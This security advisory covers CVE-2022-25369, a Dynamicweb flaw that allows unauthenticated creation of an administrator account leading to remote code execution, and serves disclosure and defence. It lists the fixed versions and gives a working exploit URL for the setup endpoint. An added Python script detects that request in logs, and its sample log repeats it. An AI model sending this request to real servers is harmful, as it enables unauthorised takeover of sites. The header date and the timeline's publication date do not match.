Research Notes
February 20, 2022

Advisory: Dynamicweb Logic Flaw Leading to RCE (CVE-2022-25369)


Summary

An issue was discovered in Dynamicweb before 9.12.8. An attacker can add a new administrator user without authentication. This flaw exists due to a logic issue when determining if the setup phases of the product can be run again.

Impact

Once an attacker is authenticated as the new admin user they have added, it is possible to upload a web shell and achieve command execution.

Version Tested Against

Dynamicweb 9.12.6

Product Description

Dynamicweb offers a cloud-based eCommerce suite. Dynamicweb enables customers to deliver better digital customer experiences and to scale eCommerce success through its Content Management, Digital Marketing, eCommerce, and Product Information Management solutions.

Solution

Hotfixed versions that contain a fix for this issue are listed below:

  • Dynamicweb 9.5.9
  • Dynamicweb 9.6.16
  • Dynamicweb 9.7.8
  • Dynamicweb 9.8.11
  • Dynamicweb 9.9.
  • Dynamicweb 9.10.18
  • Dynamicweb 9.12.8
  • Dynamicweb 9.13.0+

Vulnerabilities

https://target.com/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=admin1&adminpassword=admin1&adminemail=test@test.com&adminname=test
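As an added detection example (not part of Assetnote's advisory or Dynamicweb's code), the script below scans IIS W3C-format log lines for requests to the setup endpoint above. Once installation is complete, no legitimate traffic should reach /Admin/Access/Setup/Default.aspx, so any hit is worth reviewing, and a request carrying Action=createadministrator is the exploit pattern itself. The log lines and the field order are constructed for illustration and assume the common IIS layout shown in the #Fields directive.

```python
from urllib.parse import parse_qs

SETUP_PATH = "/admin/access/setup/default.aspx"

# Constructed IIS W3C log sample; the second and third requests mimic
# post-install access to the Dynamicweb setup wizard.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-01-20 10:01:02 10.0.0.5 GET /Admin/Default.aspx - 443 editor 203.0.113.7 Mozilla/5.0 200
2022-01-20 10:02:15 10.0.0.5 GET /Admin/Access/Setup/Default.aspx Action=createadministrator&adminusername=admin1&adminpassword=admin1&adminemail=test%40test.com&adminname=test 443 - 198.51.100.23 curl/7.79.1 200
2022-01-20 10:02:20 10.0.0.5 POST /Admin/Access/Setup/Default.aspx Action=finish 443 - 198.51.100.23 curl/7.79.1 302
2022-01-20 10:03:00 10.0.0.5 GET /Files/System/somefile.txt - 443 - 203.0.113.8 Mozilla/5.0 200
"""

FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
          "port", "user", "c_ip", "ua", "status"]


def parse_line(line):
    """Split one W3C log line into a dict; directives and short lines yield None."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(rec):
    """Return ('critical'|'suspicious', adminusername or None) for setup-endpoint hits, else None."""
    if rec["uri_stem"].lower() != SETUP_PATH:
        return None
    query = parse_qs(rec["uri_query"]) if rec["uri_query"] != "-" else {}
    # Query parameter names are matched case-insensitively, values are left intact.
    actions = [v.lower() for k, vals in query.items() if k.lower() == "action" for v in vals]
    user = next((v for k, vals in query.items() if k.lower() == "adminusername" for v in vals), None)
    if "createadministrator" in actions:
        return ("critical", user)      # unauthenticated admin creation attempt
    return ("suspicious", user)        # any other post-install use of the setup wizard


def scan(log_text):
    """Return [(severity, client_ip, http_status, adminusername)] for every flagged request."""
    findings = []
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        hit = classify(rec)
        if hit:
            findings.append((hit[0], rec["c_ip"], rec["status"], hit[1]))
    return findings


if __name__ == "__main__":
    for sev, ip, status, user in scan(SAMPLE_LOG):
        print(f"{sev:10} client={ip} status={status} adminusername={user}")
```

A 200 or 302 on the createadministrator request, rather than an error, is the signal that the setup phase was allowed to run again and the created account should be hunted for and removed.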

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.

Credits

Assetnote Security Research Team

Timeline

The timeline for this disclosure process can be found below:

  • Jan 21st, 2022: Disclosure of pre-auth bug to add admin user
  • Jan 21st, 2022: Confirmation and fix information from Dynamicweb CTO
  • Jan 24th, 2022: Fixes rolled out to Dynamicweb customers
  • Feb 24th, 2022: Published advisory and blog post
Written by:
Shubham Shah